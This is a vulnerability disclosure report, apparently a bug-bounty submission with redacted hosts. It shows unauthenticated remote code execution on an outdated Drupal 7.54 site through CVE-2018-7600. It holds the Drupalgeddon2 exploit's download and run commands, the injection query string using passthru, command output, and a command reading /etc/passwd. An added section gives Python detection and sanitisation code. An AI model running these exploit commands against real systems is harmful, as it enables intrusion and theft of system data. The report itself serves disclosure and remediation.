9.8 Critical
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.976 High
EPSS
Percentile
100.0%
Due to an outdated Drupal version (7.54), unauthenticated remote code execution is possible on www.█████ via CVE-2018-7600 (SA-CORE-2018-002).
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Vulnerable Host:
www.███
Visiting https://www.███/███ we can see a Drupal installation at version 7.54, last updated on 2017-02-01.
There are several critical and highly critical vulnerabilities known for this version (see https://api.drupal.org/api/drupal/████████/7.x and https://www.drupal.org/security). Among them is SA-CORE-2018-002 (CVE-2018-7600), which I will demonstrate here.
Note: I am reporting this here, since the page https://www.███████ seems to belong to the █████████, which belongs to the DOD. The footer further states: ██████. [...]
Download the git repository with the exploit and install its dependency:
git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2
gem install nokogiri
Run the exploit with:
ruby drupalgeddon2-customizable-beta.rb -u https://www.████████/ -v 7 -c id --form user/login
Parameters explanation:
-u, --url URL Service URL
-v, --version VERSION Target Drupal version {7,8}
-c, --command COMMAND Command to execute
--form Form to attack, by default '/user/password' in Drupal 7
The above command outputs:
root@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.████/ -v 7 -c id --form user/login
drupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete
[i] Requesting: www.███████//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup
[i] POST: form_id=user_pass&_triggering_element_name=name
[i] 200
[*] Obtained build id!: ████████
drupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete
drupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete
[i] Requesting: www.█████/file/ajax/name/%23value/██████
[i] POST: form_build_id=█████
[i] Response code: 200
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
root@5b08dc005375:/Drupalgeddon2#
As we can see, we successfully executed the id command, which responded with uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
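The following is an added example (my own Python, not code from this report or from the Drupalgeddon2 project) showing why the first request in the output above works and what the vendor fix changes. It parses that request's query string the way PHP populates $_GET/$_POST, lists the '#'-prefixed keys that reach Drupal's Form API as render-array properties (#post_render as the callback list, #markup as its argument), applies the SA-CORE-2018-002 sanitisation that strips such keys, and flags both request stages in access-log lines. The log lines, client addresses, build id and function names are constructed for illustration.

```python
# Added example (not part of the original report or the Drupalgeddon2 tool).
# It reproduces, offline, what the first request in the exploit output does to
# Drupal's request handling and what the SA-CORE-2018-002 fix changes, and it
# flags the two request shapes in web-server access logs.
import re
from urllib.parse import parse_qsl

# Query string as printed by the tool in its "[i] Requesting:" line.
SAMPLE_QUERY = "name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup"

# Constructed access-log lines (combined log format); the first two mirror the
# two requests the tool sends, the third is an ordinary password-reset visit.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2019:12:00:00 +0000] "POST /user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2019:12:00:01 +0000] "POST /file/ajax/name/%23value/form-AbCdEf HTTP/1.1" 200 200',
    '10.0.0.9 - - [01/Jan/2019:12:00:02 +0000] "GET /user/password HTTP/1.1" 200 3000',
]

_KEY = re.compile(r'^([^\[]+)((?:\[[^\]]*\])*)$')


def _assign(arr, path, value):
    """Store value at the nested key path, PHP-style (a '[]' segment appends)."""
    key = path[0]
    if key == '':
        key = len(arr)          # approximation of PHP's next integer index
    if len(path) == 1:
        arr[key] = value
        return
    child = arr.get(key)
    if not isinstance(child, dict):
        child = arr[key] = {}
    _assign(child, path[1:], value)


def php_parse_query(query):
    """Parse a query string into nested dicts the way PHP populates $_GET/$_POST,
    e.g. 'a[b][]=x' -> {'a': {'b': {0: 'x'}}}. Percent-encoding is decoded,
    so '%23' arrives as '#'."""
    result = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = _KEY.match(raw_key)
        if not m:
            continue
        segments = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        _assign(result, segments, value)
    return result


def render_array_keys(arr, prefix=''):
    """List every key path beginning with '#'. Before the fix these became
    Form API / render-array properties of the 'name' element, so #post_render
    (a list of callbacks) and #markup (their argument) were attacker-controlled."""
    found = []
    for k, v in arr.items():
        path = f'{prefix}{k}'
        if isinstance(k, str) and k.startswith('#'):
            found.append(path)
        if isinstance(v, dict):
            found.extend(render_array_keys(v, path + '/'))
    return found


def sanitize(arr):
    """Mirror the SA-CORE-2018-002 change: recursively drop request keys that
    begin with '#', so user input can no longer define render properties."""
    clean = {}
    for k, v in arr.items():
        if isinstance(k, str) and k.startswith('#'):
            continue
        clean[k] = sanitize(v) if isinstance(v, dict) else v
    return clean


# Stage 1: a parameter name carrying a '#'-prefixed render property in brackets.
STAGE1 = re.compile(r'\[(?:%23|#)[a-z_]+\]', re.I)
# Stage 2: replay through the file/ajax callback with a '#value' path segment.
STAGE2 = re.compile(r'/file/ajax/\S*/(?:%23|#)value/', re.I)


def classify_request(line):
    """Return 'stage1', 'stage2' or None for one access-log line."""
    if STAGE1.search(line):
        return 'stage1'
    if STAGE2.search(line):
        return 'stage2'
    return None


def scan_log(lines):
    """Return (label, line) for every line that matches either stage."""
    hits = []
    for line in lines:
        label = classify_request(line)
        if label:
            hits.append((label, line))
    return hits


if __name__ == '__main__':
    parsed = php_parse_query(SAMPLE_QUERY)
    print('request keys reaching Form API :', render_array_keys(parsed))
    print('after #-key sanitisation       :', sanitize(parsed))
    for label, line in scan_log(SAMPLE_LOG):
        print(label, line.split('"')[1])
```

The stage-1 keys are only visible in an access log because this tool places them in the query string; a variant that sends the same keys in the POST body needs request-body logging or a WAF rule with the same pattern. The '#value' path segment of the stage-2 request is logged either way.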
I am also providing the output of /etc/passwd, which I obtained with the command:
ruby drupalgeddon2-customizable-beta.rb -u https://www.██████/ -v 7 -c "cat /etc/passwd" --form user/login
Output:
████
██████
███████
████████
█████████
█████████
██████████
███
████
█████████
██████████
████
██████████
████████ █████
█████████
██████████
████████
██████████
██████
████
█████████
███████
███████
████
██████████
███
█████
█████
██████
Upgrade to the most recent version of Drupal 7 core (7.58 or later fixes SA-CORE-2018-002).
Critical - Remote Code Execution